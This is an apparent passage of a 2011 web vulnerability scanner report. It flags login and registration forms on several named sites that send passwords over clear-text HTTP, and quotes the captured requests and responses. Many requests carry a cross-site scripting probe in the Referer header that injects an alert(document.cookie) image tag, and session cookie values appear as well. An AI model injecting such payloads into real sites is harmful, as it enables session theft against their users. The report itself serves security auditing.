...[SNIP]...
</div>
        <form method="post" onsubmit="return login_call();">
        <div>
...[SNIP]...
</h1>
               <input type="password" name="password" id="password" value="" class="textfiled"/>
               <div class="clear">
...[SNIP]...

7.21. http://www.embarkons.com/sharer.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.embarkons.com/src/new_register.php. The form contains the following password field: passwordreg

Request

GET /sharer.php HTTP/1.1
Host: www.embarkons.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:14:43 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=gbg770phnl6gp5f4qddlhef3v6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:14:43 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</h2>
<form name="register" id="frm_register" action="/src/new_register.php" method="post" autocomplete="off" onSubmit="return ValidateForm();" > <div class="form-align">
...[SNIP]...
</h1>
<input name="passwordreg" value="" type="password" class="textfiled" id="passwordreg" />
<div class="clear">
...[SNIP]...

7.22. http://www.embarkons.com/sharer.php/a

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/a

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /sharer.php/a HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:14 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22621

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</h2>
<form name="register" id="frm_register" action="/src/new_register.php" method="post" autocomplete="off" onSubmit="return ValidateForm();" > <div class="form-align">
...[SNIP]...
</h1>
<input name="passwordreg" value="" type="password" class="textfiled" id="passwordreg" />
<div class="clear">
...[SNIP]...

7.23. http://www.embarkons.com/sharer.php/a

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/a

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /sharer.php/a HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:14 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22621

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>
        <form method="post" onsubmit="return login_call();">
        <div>
...[SNIP]...
</h1>
               <input type="password" name="password" id="password" value="" class="textfiled"/>
               <div class="clear">
...[SNIP]...

7.24. http://www.embarkons.com/sharer.php/images/close-icon.gif

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/close-icon.gif

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /sharer.php/images/close-icon.gif HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:14 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:16 GMT; path=/
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</h2>
<form name="register" id="frm_register" action="/src/new_register.php" method="post" autocomplete="off" onSubmit="return ValidateForm();" > <div class="form-align">
...[SNIP]...
</h1>
<input name="passwordreg" value="" type="password" class="textfiled" id="passwordreg" />
<div class="clear">
...[SNIP]...

7.25. http://www.embarkons.com/sharer.php/images/close-icon.gif

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/close-icon.gif

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /sharer.php/images/close-icon.gif HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:14 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:16 GMT; path=/
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>
        <form method="post" onsubmit="return login_call();">
        <div>
...[SNIP]...
</h1>
               <input type="password" name="password" id="password" value="" class="textfiled"/>
               <div class="clear">
...[SNIP]...

7.26. http://www.embarkons.com/sharer.php/images/postit-bulb.gif

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/postit-bulb.gif

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /sharer.php/images/postit-bulb.gif HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:14 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:14 GMT; path=/
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>
        <form method="post" onsubmit="return login_call();">
        <div>
...[SNIP]...
</h1>
               <input type="password" name="password" id="password" value="" class="textfiled"/>
               <div class="clear">
...[SNIP]...

7.27. http://www.embarkons.com/sharer.php/images/postit-bulb.gif

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/postit-bulb.gif

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /sharer.php/images/postit-bulb.gif HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:14 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:14 GMT; path=/
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</h2>
<form name="register" id="frm_register" action="/src/new_register.php" method="post" autocomplete="off" onSubmit="return ValidateForm();" > <div class="form-align">
...[SNIP]...
</h1>
<input name="passwordreg" value="" type="password" class="textfiled" id="passwordreg" />
<div class="clear">
...[SNIP]...

7.28. http://www.embarkons.com/sharer.php/images/postitsubmitbtn.png

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/postitsubmitbtn.png

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /sharer.php/images/postitsubmitbtn.png HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:14 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:16 GMT; path=/
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>
        <form method="post" onsubmit="return login_call();">
        <div>
...[SNIP]...
</h1>
               <input type="password" name="password" id="password" value="" class="textfiled"/>
               <div class="clear">
...[SNIP]...

7.29. http://www.embarkons.com/sharer.php/images/postitsubmitbtn.png

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/postitsubmitbtn.png

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /sharer.php/images/postitsubmitbtn.png HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:14 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:16 GMT; path=/
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</h2>
<form name="register" id="frm_register" action="/src/new_register.php" method="post" autocomplete="off" onSubmit="return ValidateForm();" > <div class="form-align">
...[SNIP]...
</h1>
<input name="passwordreg" value="" type="password" class="textfiled" id="passwordreg" />
<div class="clear">
...[SNIP]...

7.30. http://www.embarkons.com/sharer.php/images/search-con.gif

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/search-con.gif

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /sharer.php/images/search-con.gif HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:15 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:17 GMT; path=/
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</h2>
<form name="register" id="frm_register" action="/src/new_register.php" method="post" autocomplete="off" onSubmit="return ValidateForm();" > <div class="form-align">
...[SNIP]...
</h1>
<input name="passwordreg" value="" type="password" class="textfiled" id="passwordreg" />
<div class="clear">
...[SNIP]...

7.31. http://www.embarkons.com/sharer.php/images/search-con.gif

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/search-con.gif

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /sharer.php/images/search-con.gif HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:15 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:17 GMT; path=/
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>
        <form method="post" onsubmit="return login_call();">
        <div>
...[SNIP]...
</h1>
               <input type="password" name="password" id="password" value="" class="textfiled"/>
               <div class="clear">
...[SNIP]...

7.32. http://www.embarkons.com/sharer.php/src/captcha.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/src/captcha.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /sharer.php/src/captcha.php HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:16 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:18 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</h2>
<form name="register" id="frm_register" action="/src/new_register.php" method="post" autocomplete="off" onSubmit="return ValidateForm();" > <div class="form-align">
...[SNIP]...
</h1>
<input name="passwordreg" value="" type="password" class="textfiled" id="passwordreg" />
<div class="clear">
...[SNIP]...

7.33. http://www.embarkons.com/sharer.php/src/captcha.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/src/captcha.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /sharer.php/src/captcha.php HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:16 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:18 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>
        <form method="post" onsubmit="return login_call();">
        <div>
...[SNIP]...
</h1>
               <input type="password" name="password" id="password" value="" class="textfiled"/>
               <div class="clear">
...[SNIP]...

7.34. http://www.ezyspot.com/submit

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ezyspot.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /submit HTTP/1.1
Host: www.ezyspot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Date: Sun, 17 Apr 2011 14:14:47 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: SESS6d5cee1f12a75d25bdb4f8cce517a887=vhmvsik0ihgph66i86527ecgq1; expires=Sun, 17-Apr-2011 19:48:07 GMT; path=/; domain=.ezyspot.com
Last-Modified: Sun, 17 Apr 2011 14:10:28 GMT
ETag: "09fc5e6c01869f47755b52b2afc74a46"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title>A
...[SNIP]...
<div class="content">
<form action="/?destination=node%2Fadd%2Fdrigg" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

7.35. http://www.forceindya.com/submit

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forceindya.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /submit HTTP/1.1
Host: www.forceindya.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Date: Sun, 17 Apr 2011 14:14:51 GMT
Server: Apache
Cache-Control: must-revalidate
ETag: "3971f045cd9a98bd40e7777d2352a286"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
X-Powered-By: PHP/5.2.14
Set-Cookie: SESScd5f14015055dde96a852eab86a49d94=ee255076611c19d55aeee88e890d8001; expires=Tue, 10-May-2011 17:48:11 GMT; path=/; domain=.forceindya.com
Last-Modified: Sun, 17 Apr 2011 14:14:51 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<div class="content">
<form action="/submit?destination=node%2Fadd%2Fdrigg" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

7.36. http://www.fulbright.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:16:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=27740077;domain=.fulbright.com;expires=Tue, 09-Apr-2041 14:16:18 GMT;path=/
Set-Cookie: CFTOKEN=87543621;domain=.fulbright.com;expires=Tue, 09-Apr-2041 14:16:18 GMT;path=/
Set-Cookie: CFID=27740077;path=/
Set-Cookie: CFTOKEN=87543621;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <META HTT
...[SNIP]...
</p>

